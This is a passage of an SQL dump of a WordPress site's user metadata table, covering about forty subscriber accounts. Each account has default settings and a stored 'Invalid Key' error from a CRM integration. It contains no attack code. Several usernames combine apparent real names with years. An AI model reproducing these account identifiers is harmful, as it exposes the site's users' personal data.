(38546, 2956, 'cyb_user_level', '0'),
(38547, 2956, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38548, 2956, 'default_password_nag', '1'),
(38549, 2957, 'nickname', 'seanhampson1980'),
(38550, 2957, 'first_name', ''),
(38551, 2957, 'last_name', ''),
(38552, 2957, 'description', ''),
(38553, 2957, 'rich_editing', 'true'),
(38554, 2957, 'comment_shortcuts', 'false'),
(38555, 2957, 'admin_color', 'fresh'),
(38556, 2957, 'use_ssl', '0'),
(38557, 2957, 'show_admin_bar_front', 'true'),
(38558, 2957, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38559, 2957, 'cyb_user_level', '0'),
(38560, 2957, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38561, 2957, 'default_password_nag', '1'),
(38562, 2958, 'nickname', 'syanics1979'),
(38563, 2958, 'first_name', ''),
(38564, 2958, 'last_name', ''),
(38565, 2958, 'description', ''),
(38566, 2958, 'rich_editing', 'true'),
(38567, 2958, 'comment_shortcuts', 'false'),
(38568, 2958, 'admin_color', 'fresh'),
(38569, 2958, 'use_ssl', '0'),
(38570, 2958, 'show_admin_bar_front', 'true'),
(38571, 2958, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38572, 2958, 'cyb_user_level', '0'),
(38573, 2958, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38574, 2958, 'default_password_nag', '1'),
(38575, 2959, 'nickname', 'theustee1982'),
(38576, 2959, 'first_name', ''),
(38577, 2959, 'last_name', ''),
(38578, 2959, 'description', ''),
(38579, 2959, 'rich_editing', 'true'),
(38580, 2959, 'comment_shortcuts', 'false'),
(38581, 2959, 'admin_color', 'fresh'),
(38582, 2959, 'use_ssl', '0'),
(38583, 2959, 'show_admin_bar_front', 'true'),
(38584, 2959, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38585, 2959, 'cyb_user_level', '0'),
(38586, 2959, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38587, 2959, 'default_password_nag', '1'),
(38588, 2960, 'nickname', 'kp15701981'),
(38589, 2960, 'first_name', ''),
(38590, 2960, 'last_name', ''),
(38591, 2960, 'description', ''),
(38592, 2960, 'rich_editing', 'true'),
(38593, 2960, 'comment_shortcuts', 'false'),
(38594, 2960, 'admin_color', 'fresh'),
(38595, 2960, 'use_ssl', '0'),
(38596, 2960, 'show_admin_bar_front', 'true'),
(38597, 2960, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38598, 2960, 'cyb_user_level', '0'),
(38599, 2960, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38600, 2960, 'default_password_nag', '1'),
(38601, 2961, 'nickname', 'venkattvr2009'),
(38602, 2961, 'first_name', ''),
(38603, 2961, 'last_name', ''),
(38604, 2961, 'description', ''),
(38605, 2961, 'rich_editing', 'true'),
(38606, 2961, 'comment_shortcuts', 'false'),
(38607, 2961, 'admin_color', 'fresh'),
(38608, 2961, 'use_ssl', '0'),
(38609, 2961, 'show_admin_bar_front', 'true'),
(38610, 2961, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38611, 2961, 'cyb_user_level', '0'),
(38612, 2961, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38613, 2961, 'default_password_nag', '1'),
(38614, 2962, 'nickname', 'broy1999'),
(38615, 2962, 'first_name', ''),
(38616, 2962, 'last_name', ''),
(38617, 2962, 'description', ''),
(38618, 2962, 'rich_editing', 'true'),
(38619, 2962, 'comment_shortcuts', 'false'),
(38620, 2962, 'admin_color', 'fresh'),
(38621, 2962, 'use_ssl', '0'),
(38622, 2962, 'show_admin_bar_front', 'true'),
(38623, 2962, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38624, 2962, 'cyb_user_level', '0'),
(38625, 2962, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38626, 2962, 'default_password_nag', '1'),
(38627, 2963, 'nickname', 'broncexocomil1960'),
(38628, 2963, 'first_name', ''),
(38629, 2963, 'last_name', ''),
(38630, 2963, 'description', ''),
(38631, 2963, 'rich_editing', 'true'),
(38632, 2963, 'comment_shortcuts', 'false'),
(38633, 2963, 'admin_color', 'fresh'),
(38634, 2963, 'use_ssl', '0'),
(38635, 2963, 'show_admin_bar_front', 'true'),
(38636, 2963, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38637, 2963, 'cyb_user_level', '0'),
(38638, 2963, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38639, 2963, 'default_password_nag', '1'),
(38640, 2964, 'nickname', 'kipcole651988'),
(38641, 2964, 'first_name', ''),
(38642, 2964, 'last_name', ''),
(38643, 2964, 'description', ''),
(38644, 2964, 'rich_editing', 'true'),
(38645, 2964, 'comment_shortcuts', 'false'),
(38646, 2964, 'admin_color', 'fresh'),
(38647, 2964, 'use_ssl', '0'),
(38648, 2964, 'show_admin_bar_front', 'true'),
(38649, 2964, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38650, 2964, 'cyb_user_level', '0'),
(38651, 2964, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38652, 2964, 'default_password_nag', '1'),
(38653, 2965, 'nickname', 'amazon1979'),
(38654, 2965, 'first_name', ''),
(38655, 2965, 'last_name', ''),
(38656, 2965, 'description', ''),
(38657, 2965, 'rich_editing', 'true'),
(38658, 2965, 'comment_shortcuts', 'false'),
(38659, 2965, 'admin_color', 'fresh'),
(38660, 2965, 'use_ssl', '0'),
(38661, 2965, 'show_admin_bar_front', 'true'),
(38662, 2965, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38663, 2965, 'cyb_user_level', '0'),
(38664, 2965, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38665, 2965, 'default_password_nag', '1'),
(38666, 2966, 'nickname', 'rmoore1952'),
(38667, 2966, 'first_name', ''),
(38668, 2966, 'last_name', ''),
(38669, 2966, 'description', ''),
(38670, 2966, 'rich_editing', 'true'),
(38671, 2966, 'comment_shortcuts', 'false'),
(38672, 2966, 'admin_color', 'fresh'),
(38673, 2966, 'use_ssl', '0'),
(38674, 2966, 'show_admin_bar_front', 'true'),
(38675, 2966, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38676, 2966, 'cyb_user_level', '0'),
(38677, 2966, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38678, 2966, 'default_password_nag', '1'),
(38679, 2967, 'nickname', 'mindaugas.petrosius2010'),
(38680, 2967, 'first_name', ''),
(38681, 2967, 'last_name', ''),
(38682, 2967, 'description', ''),
(38683, 2967, 'rich_editing', 'true'),
(38684, 2967, 'comment_shortcuts', 'false'),
(38685, 2967, 'admin_color', 'fresh'),
(38686, 2967, 'use_ssl', '0'),
(38687, 2967, 'show_admin_bar_front', 'true'),
(38688, 2967, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38689, 2967, 'cyb_user_level', '0'),
(38690, 2967, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38691, 2967, 'default_password_nag', '1'),
(38692, 2968, 'nickname', 'tjneuman1988'),
(38693, 2968, 'first_name', ''),
(38694, 2968, 'last_name', ''),
(38695, 2968, 'description', ''),
(38696, 2968, 'rich_editing', 'true'),
(38697, 2968, 'comment_shortcuts', 'false'),
(38698, 2968, 'admin_color', 'fresh'),
(38699, 2968, 'use_ssl', '0'),
(38700, 2968, 'show_admin_bar_front', 'true'),
(38701, 2968, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38702, 2968, 'cyb_user_level', '0'),
(38703, 2968, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38704, 2968, 'default_password_nag', '1'),
(38705, 2969, 'nickname', 'rachelleyoung2004'),
(38706, 2969, 'first_name', ''),
(38707, 2969, 'last_name', ''),
(38708, 2969, 'description', ''),
(38709, 2969, 'rich_editing', 'true'),
(38710, 2969, 'comment_shortcuts', 'false'),
(38711, 2969, 'admin_color', 'fresh'),
(38712, 2969, 'use_ssl', '0'),
(38713, 2969, 'show_admin_bar_front', 'true'),
(38714, 2969, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38715, 2969, 'cyb_user_level', '0'),
(38716, 2969, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38717, 2969, 'default_password_nag', '1'),
(38718, 2970, 'nickname', 'k_altamir1997'),
(38719, 2970, 'first_name', ''),
(38720, 2970, 'last_name', ''),
(38721, 2970, 'description', ''),
(38722, 2970, 'rich_editing', 'true'),
(38723, 2970, 'comment_shortcuts', 'false'),
(38724, 2970, 'admin_color', 'fresh'),
(38725, 2970, 'use_ssl', '0'),
(38726, 2970, 'show_admin_bar_front', 'true'),
(38727, 2970, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38728, 2970, 'cyb_user_level', '0'),
(38729, 2970, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38730, 2970, 'default_password_nag', '1'),
(38731, 2971, 'nickname', 'allan.vandenbosch1961'),
(38732, 2971, 'first_name', ''),
(38733, 2971, 'last_name', ''),
(38734, 2971, 'description', ''),
(38735, 2971, 'rich_editing', 'true'),
(38736, 2971, 'comment_shortcuts', 'false'),
(38737, 2971, 'admin_color', 'fresh'),
(38738, 2971, 'use_ssl', '0'),
(38739, 2971, 'show_admin_bar_front', 'true'),
(38740, 2971, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38741, 2971, 'cyb_user_level', '0'),
(38742, 2971, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38743, 2971, 'default_password_nag', '1'),
(38744, 2972, 'nickname', 'jesdip171950'),
(38745, 2972, 'first_name', ''),
(38746, 2972, 'last_name', ''),
(38747, 2972, 'description', ''),
(38748, 2972, 'rich_editing', 'true'),
(38749, 2972, 'comment_shortcuts', 'false'),
(38750, 2972, 'admin_color', 'fresh'),
(38751, 2972, 'use_ssl', '0'),
(38752, 2972, 'show_admin_bar_front', 'true'),
(38753, 2972, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38754, 2972, 'cyb_user_level', '0'),
(38755, 2972, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38756, 2972, 'default_password_nag', '1'),
(38757, 2973, 'nickname', 'sirwilliam7321952'),
(38758, 2973, 'first_name', ''),
(38759, 2973, 'last_name', ''),
(38760, 2973, 'description', ''),
(38761, 2973, 'rich_editing', 'true'),
(38762, 2973, 'comment_shortcuts', 'false'),
(38763, 2973, 'admin_color', 'fresh'),
(38764, 2973, 'use_ssl', '0'),
(38765, 2973, 'show_admin_bar_front', 'true'),
(38766, 2973, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38767, 2973, 'cyb_user_level', '0'),
(38768, 2973, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38769, 2973, 'default_password_nag', '1'),
(38770, 2974, 'nickname', 'tashclancy1969'),
(38771, 2974, 'first_name', ''),
(38772, 2974, 'last_name', ''),
(38773, 2974, 'description', ''),
(38774, 2974, 'rich_editing', 'true'),
(38775, 2974, 'comment_shortcuts', 'false'),
(38776, 2974, 'admin_color', 'fresh'),
(38777, 2974, 'use_ssl', '0'),
(38778, 2974, 'show_admin_bar_front', 'true'),
(38779, 2974, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38780, 2974, 'cyb_user_level', '0'),
(38781, 2974, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38782, 2974, 'default_password_nag', '1'),
(38783, 2975, 'nickname', 'julyamhmm1959'),
(38784, 2975, 'first_name', ''),
(38785, 2975, 'last_name', ''),
(38786, 2975, 'description', ''),
(38787, 2975, 'rich_editing', 'true'),
(38788, 2975, 'comment_shortcuts', 'false'),
(38789, 2975, 'admin_color', 'fresh'),
(38790, 2975, 'use_ssl', '0'),
(38791, 2975, 'show_admin_bar_front', 'true'),
(38792, 2975, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38793, 2975, 'cyb_user_level', '0'),
(38794, 2975, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38795, 2975, 'default_password_nag', '1'),
(38796, 2976, 'nickname', 'spree1821995'),
(38797, 2976, 'first_name', ''),
(38798, 2976, 'last_name', ''),
(38799, 2976, 'description', ''),
(38800, 2976, 'rich_editing', 'true'),
(38801, 2976, 'comment_shortcuts', 'false'),
(38802, 2976, 'admin_color', 'fresh'),
(38803, 2976, 'use_ssl', '0'),
(38804, 2976, 'show_admin_bar_front', 'true'),
(38805, 2976, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38806, 2976, 'cyb_user_level', '0'),
(38807, 2976, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38808, 2976, 'default_password_nag', '1'),
(38809, 2977, 'nickname', 'pennywiseadi1961'),
(38810, 2977, 'first_name', ''),
(38811, 2977, 'last_name', ''),
(38812, 2977, 'description', ''),
(38813, 2977, 'rich_editing', 'true'),
(38814, 2977, 'comment_shortcuts', 'false'),
(38815, 2977, 'admin_color', 'fresh'),
(38816, 2977, 'use_ssl', '0'),
(38817, 2977, 'show_admin_bar_front', 'true'),
(38818, 2977, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38819, 2977, 'cyb_user_level', '0'),
(38820, 2977, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38821, 2977, 'default_password_nag', '1'),
(38822, 2978, 'nickname', 'sarah.vandenheuvel1974'),
(38823, 2978, 'first_name', ''),
(38824, 2978, 'last_name', ''),
(38825, 2978, 'description', ''),
(38826, 2978, 'rich_editing', 'true'),
(38827, 2978, 'comment_shortcuts', 'false'),
(38828, 2978, 'admin_color', 'fresh'),
(38829, 2978, 'use_ssl', '0'),
(38830, 2978, 'show_admin_bar_front', 'true'),
(38831, 2978, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38832, 2978, 'cyb_user_level', '0'),
(38833, 2978, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38834, 2978, 'default_password_nag', '1'),
(38835, 2979, 'nickname', 'alejandrolr201989'),
(38836, 2979, 'first_name', ''),
(38837, 2979, 'last_name', ''),
(38838, 2979, 'description', ''),
(38839, 2979, 'rich_editing', 'true'),
(38840, 2979, 'comment_shortcuts', 'false'),
(38841, 2979, 'admin_color', 'fresh'),
(38842, 2979, 'use_ssl', '0'),
(38843, 2979, 'show_admin_bar_front', 'true'),
(38844, 2979, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38845, 2979, 'cyb_user_level', '0'),
(38846, 2979, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38847, 2979, 'default_password_nag', '1'),
(38848, 2980, 'nickname', 'toniestevens2009'),
(38849, 2980, 'first_name', ''),
(38850, 2980, 'last_name', ''),
(38851, 2980, 'description', ''),
(38852, 2980, 'rich_editing', 'true'),
(38853, 2980, 'comment_shortcuts', 'false'),
(38854, 2980, 'admin_color', 'fresh'),
(38855, 2980, 'use_ssl', '0'),
(38856, 2980, 'show_admin_bar_front', 'true'),
(38857, 2980, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38858, 2980, 'cyb_user_level', '0'),
(38859, 2980, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38860, 2980, 'default_password_nag', '1'),
(38861, 2981, 'nickname', 'rgo19541969'),
(38862, 2981, 'first_name', ''),
(38863, 2981, 'last_name', ''),
(38864, 2981, 'description', ''),
(38865, 2981, 'rich_editing', 'true'),
(38866, 2981, 'comment_shortcuts', 'false'),
(38867, 2981, 'admin_color', 'fresh'),
(38868, 2981, 'use_ssl', '0'),
(38869, 2981, 'show_admin_bar_front', 'true'),
(38870, 2981, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38871, 2981, 'cyb_user_level', '0'),
(38872, 2981, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38873, 2981, 'default_password_nag', '1'),
(38874, 2982, 'nickname', 'latoiyak1998'),
(38875, 2982, 'first_name', ''),
(38876, 2982, 'last_name', ''),
(38877, 2982, 'description', ''),
(38878, 2982, 'rich_editing', 'true'),
(38879, 2982, 'comment_shortcuts', 'false'),
(38880, 2982, 'admin_color', 'fresh'),
(38881, 2982, 'use_ssl', '0'),
(38882, 2982, 'show_admin_bar_front', 'true'),
(38883, 2982, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38884, 2982, 'cyb_user_level', '0'),
(38885, 2982, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38886, 2982, 'default_password_nag', '1'),
(38887, 2983, 'nickname', 'alicia.rutledge2003'),
(38888, 2983, 'first_name', ''),
(38889, 2983, 'last_name', ''),
(38890, 2983, 'description', ''),
(38891, 2983, 'rich_editing', 'true'),
(38892, 2983, 'comment_shortcuts', 'false'),
(38893, 2983, 'admin_color', 'fresh'),
(38894, 2983, 'use_ssl', '0'),
(38895, 2983, 'show_admin_bar_front', 'true'),
(38896, 2983, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38897, 2983, 'cyb_user_level', '0'),
(38898, 2983, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38899, 2983, 'default_password_nag', '1'),
(38900, 2984, 'nickname', 'matthew1.watson2010'),
(38901, 2984, 'first_name', ''),
(38902, 2984, 'last_name', ''),
(38903, 2984, 'description', ''),
(38904, 2984, 'rich_editing', 'true'),
(38905, 2984, 'comment_shortcuts', 'false'),
(38906, 2984, 'admin_color', 'fresh'),
(38907, 2984, 'use_ssl', '0'),
(38908, 2984, 'show_admin_bar_front', 'true'),
(38909, 2984, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38910, 2984, 'cyb_user_level', '0'),
(38911, 2984, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38912, 2984, 'default_password_nag', '1'),
(38913, 2985, 'nickname', 'susanchristen1964'),
(38914, 2985, 'first_name', ''),
(38915, 2985, 'last_name', ''),
(38916, 2985, 'description', ''),
(38917, 2985, 'rich_editing', 'true'),
(38918, 2985, 'comment_shortcuts', 'false'),
(38919, 2985, 'admin_color', 'fresh'),
(38920, 2985, 'use_ssl', '0'),
(38921, 2985, 'show_admin_bar_front', 'true'),
(38922, 2985, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38923, 2985, 'cyb_user_level', '0'),
(38924, 2985, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38925, 2985, 'default_password_nag', '1'),
(38926, 2986, 'nickname', 'katierahm1958'),
(38927, 2986, 'first_name', ''),
(38928, 2986, 'last_name', ''),
(38929, 2986, 'description', ''),
(38930, 2986, 'rich_editing', 'true'),
(38931, 2986, 'comment_shortcuts', 'false'),
(38932, 2986, 'admin_color', 'fresh'),
(38933, 2986, 'use_ssl', '0'),
(38934, 2986, 'show_admin_bar_front', 'true'),
(38935, 2986, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38936, 2986, 'cyb_user_level', '0'),
(38937, 2986, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38938, 2986, 'default_password_nag', '1'),
(38939, 2987, 'nickname', 'ljstorer1995'),
(38940, 2987, 'first_name', ''),
(38941, 2987, 'last_name', ''),
(38942, 2987, 'description', ''),
(38943, 2987, 'rich_editing', 'true'),
(38944, 2987, 'comment_shortcuts', 'false'),
(38945, 2987, 'admin_color', 'fresh'),
(38946, 2987, 'use_ssl', '0'),
(38947, 2987, 'show_admin_bar_front', 'true'),
(38948, 2987, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38949, 2987, 'cyb_user_level', '0'),
(38950, 2987, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38951, 2987, 'default_password_nag', '1'),
(38952, 2988, 'nickname', 'anth1611986'),
(38953, 2988, 'first_name', ''),
(38954, 2988, 'last_name', ''),
(38955, 2988, 'description', ''),
(38956, 2988, 'rich_editing', 'true'),
(38957, 2988, 'comment_shortcuts', 'false'),
(38958, 2988, 'admin_color', 'fresh'),
(38959, 2988, 'use_ssl', '0'),
(38960, 2988, 'show_admin_bar_front', 'true'),
(38961, 2988, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38962, 2988, 'cyb_user_level', '0'),
(38963, 2988, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38964, 2988, 'default_password_nag', '1'),
(38965, 2989, 'nickname', 'white_0271957'),
(38966, 2989, 'first_name', ''),
(38967, 2989, 'last_name', ''),
(38968, 2989, 'description', ''),
(38969, 2989, 'rich_editing', 'true'),
(38970, 2989, 'comment_shortcuts', 'false'),
(38971, 2989, 'admin_color', 'fresh'),
(38972, 2989, 'use_ssl', '0'),
(38973, 2989, 'show_admin_bar_front', 'true'),
(38974, 2989, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38975, 2989, 'cyb_user_level', '0'),
(38976, 2989, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38977, 2989, 'default_password_nag', '1'),
(38978, 2990, 'nickname', 'matthewguenther332010'),
(38979, 2990, 'first_name', ''),
(38980, 2990, 'last_name', ''),
(38981, 2990, 'description', ''),
(38982, 2990, 'rich_editing', 'true'),
(38983, 2990, 'comment_shortcuts', 'false'),
(38984, 2990, 'admin_color', 'fresh'),
(38985, 2990, 'use_ssl', '0'),
(38986, 2990, 'show_admin_bar_front', 'true'),
(38987, 2990, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38988, 2990, 'cyb_user_level', '0'),
(38989, 2990, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38990, 2990, 'default_password_nag', '1'),
(38991, 2991, 'nickname', 'mscatrd2005'),
(38992, 2991, 'first_name', ''),
(38993, 2991, 'last_name', ''),
(38994, 2991, 'description', ''),
(38995, 2991, 'rich_editing', 'true'),
(38996, 2991, 'comment_shortcuts', 'false'),
(38997, 2991, 'admin_color', 'fresh'),
(38998, 2991, 'use_ssl', '0'),
(38999, 2991, 'show_admin_bar_front', 'true'),
(39000, 2991, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(39001, 2991, 'cyb_user_level', '0'),
(39002, 2991, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(39003, 2991, 'default_password_nag', '1'),
(39004, 2992, 'nickname', 'aaron0341998'),
(39005, 2992, 'first_name', ''),
(39006, 2992, 'last_name', ''),
(39007, 2992, 'description', ''),
(39008, 2992, 'rich_editing', 'true'),
(39009, 2992, 'comment_shortcuts', 'false'),
(39010, 2992, 'admin_color', 'fresh'),
(39011, 2992, 'use_ssl', '0'),
(39012, 2992, 'show_admin_bar_front', 'true'),
(39013, 2992, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(39014, 2992, 'cyb_user_level', '0'),
(39015, 2992, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(39016, 2992, 'default_password_nag', '1'),
(39017, 2993, 'nickname', 'whoknowswhen1983'),
(39018, 2993, 'first_name', ''),
(39019, 2993, 'last_name', ''),
(39020, 2993, 'description', ''),
(39021, 2993, 'rich_editing', 'true'),
(39022, 2993, 'comment_shortcuts', 'false'),
(39023, 2993, 'admin_color', 'fresh'),
(39024, 2993, 'use_ssl', '0'),
(39025, 2993, 'show_admin_bar_front', 'true'),
(39026, 2993, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(39027, 2993, 'cyb_user_level', '0'),
(39028, 2993, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(39029, 2993, 'default_password_nag', '1'),
(39030, 2994, 'nickname', 'charlieconnor1954'),
(39031, 2994, 'first_name', ''),
(39032, 2994, 'last_name', ''),
(39033, 2994, 'description', ''),
(39034, 2994, 'rich_editing', 'true'),
(39035, 2994, 'comment_shortcuts', 'false'),
(39036, 2994, 'admin_color', 'fresh'),
(39037, 2994, 'use_ssl', '0'),
